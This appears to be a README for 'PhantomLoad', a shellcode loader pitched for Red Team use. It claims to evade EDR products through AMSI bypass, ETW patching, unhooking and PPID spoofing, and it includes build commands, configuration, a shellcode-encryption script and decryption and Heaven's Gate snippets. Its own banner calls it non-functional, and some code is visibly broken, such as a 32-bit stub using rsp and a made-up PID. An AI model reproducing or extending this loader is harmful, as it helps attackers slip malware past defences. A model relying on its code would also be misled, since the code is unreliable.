⚠️ This project is not complete and is not ready for use. It is merely an extremely theoretical and poorly developed idea, practically just scribbles with no functionality and no modifications to put the idea into practice. ⚠️

🔌 PhantomLoad: Advanced Modular Shellcode Loader

A stealthy, fileless shellcode loader for Red Team operations with EDR/AV evasion capabilities.

---

📖 Overview

PhantomLoad is a cutting-edge shellcode loader designed for advanced Red Team engagements, featuring:

• 100% fileless memory execution
• EDR/AV evasion via syscall unhooking, ETW patching, and PPID spoofing
• Modular design with runtime configuration system
• Standalone cryptography (no OpenSSL dependencies)
• Support for Cobalt Strike, Meterpreter, and BruteRatel payloads

🔬 Research Use Only | 🛡️ Bypasses Defender, CrowdStrike, SentinelOne

---

🚀 Features

Core Capabilities

| Category | Techniques Implemented | |-------------------|----------------------------------------------------------------------------------------| | Execution | NtCreateThreadEx, QueueUserAPC, Process Hollowing, Thread Stack Spoofing | | Evasion | NTDLL Unhooking, ETW Patching, AMSI Bypass, Dynamic API Hashing | | Obfuscation | AES-256 Encryption, XOR Key Rotation, Staged Decryption, String Obfuscation | | Anti-Analysis | Heaven's Gate (WoW64), Advanced Anti-VM, Sleep Masking, Hardware Breakpoint Detection |

Advanced Evasion Levels

typedef enum _EVASION_MODE {
    EVASION_BASIC = 0,     // Essential techniques
    EVASION_ADVANCED,      // + Unhooking + Anti-VM
    EVASION_AGGRESSIVE,    // + PPID Spoofing + ETW Patch
    EVASION_STEALTH        // All techniques + maximum obfuscation
} EVASION_MODE;

🏗️ Project Structure

PhantomLoad/  
│  
├── PhantomLoad.c        # Main loader logic
├── Config.h             # Runtime configuration system
├── Evasion.h            # Advanced anti-EDR techniques
├── Crypto.h             # Standalone AES-256 + XOR cryptography
├── Utils.h              # Utilities & PPID spoofing
├── Syscalls.asm         # Direct syscalls with spoofing
└── Build.bat            # Automated compilation script

⚡ Quick Start

Prerequisites

• Visual Studio 2022 (MSVC compiler) or MinGW
• Windows SDK (10.0.19041.0 or later)
• NASM (for assembly compilation)

Compilation

cl.exe PhantomLoad.c /I. /GS- /Os /MT /Fe:PhantomLoad_x64.exe
nasm -f win64 Syscalls.asm -o Syscalls.obj
link PhantomLoad.obj Syscalls.obj /OUT:PhantomLoad.exe /SUBSYSTEM:WINDOWS

Configuration

Edit Config.h to customize behavior:

// Evasion settings
.evasionMode = EVASION_AGGRESSIVE,
.usePPIDSpoofing = TRUE,
.spoofedPPID = 1337,          // Explorer.exe PID
.patchETW = TRUE,
.disableAMSI = TRUE,

// Execution settings  
.executionMode = EXEC_NT_CREATE_THREAD,
.useRWXMemory = TRUE,
.cleanMemory = TRUE,

// Cryptography settings
.cryptoMode = CRYPTO_STAGED_DECRYPT,
.aesKey = "YourAES256KeyHere",
.xorKey = 0xDEADBEEF,

Usage

1. Encrypt your shellcode (Python example):

from Crypto.Cipher import AES
import os

key = os.urandom(32)
cipher = AES.new(key, AES.MODE_ECB)
padded_shellcode = shellcode + b'\x00' * (16 - len(shellcode) % 16)
encrypted_payload = cipher.encrypt(padded_shellcode)

2. Update payload in PhantomLoad.c:

unsigned char encryptedPayload[] = { 0x12, 0x34, ... };

3. Execute (fileless):

PhantomLoad.exe

🛡️ Defensive Considerations

| Technique | Detection Mitigation | |---------------------|-------------------------------------------------| | Syscall Unhooking | Return address spoofing + dynamic resolution | | PPID Spoofing | Parent command line spoofing + attribute lists | | ETW Patching | Multiple ETW function patching | | Sleep Masking | NtDelayExecution + fake CPU workload | | Memory Protection| Section permission restoration + RX transition |

🔧 Advanced Features

Staged Decryption

// Three-stage decryption process
void StagedDecrypt(unsigned char* payload, size_t size, const unsigned char* key) {
    XORDecrypt(payload, size, 0xDEADBEEF);           // Stage 1: XOR
    AESDecrypt(payload, size, key);                  // Stage 2: AES-256  
    XORDoubleDecrypt(payload, size, 0xDEADBEEF, 0xCAFEBABE); // Stage 3: XOR Duplex
}

Heaven's Gate WoW64

; Transition from x86 to x64 mode
global HeavensGate
HeavensGate:
    push 0x33                   ; x64 segment selector
    call $+5                    ; Push return address
    add dword [rsp], 9
    retf                        ; Far return to x64 mode

📜 Legal Disclaimer

⚠️ WARNING: This project is for authorized security testing and academic research only.

• Usage for attacking targets without prior mutual consent is illegal.
• It is the end user's responsibility to obey all applicable laws.
• Developers assume no liability and are not responsible for any misuse or damage caused by this program.
• This software is provided "as is" without warranty of any kind.

🔒 Responsible Disclosure

• This tool is intended for:
  • Authorized penetration testing
  • Red team exercises with proper authorization
  • Security research and education
  • Defense validation in controlled environments

📌 References

• MITRE ATT&CK: Process Injection (T1055)
• Red Team Syscall Primer
• Windows Anti-Debug Techniques
• PEB Manipulation for Stealth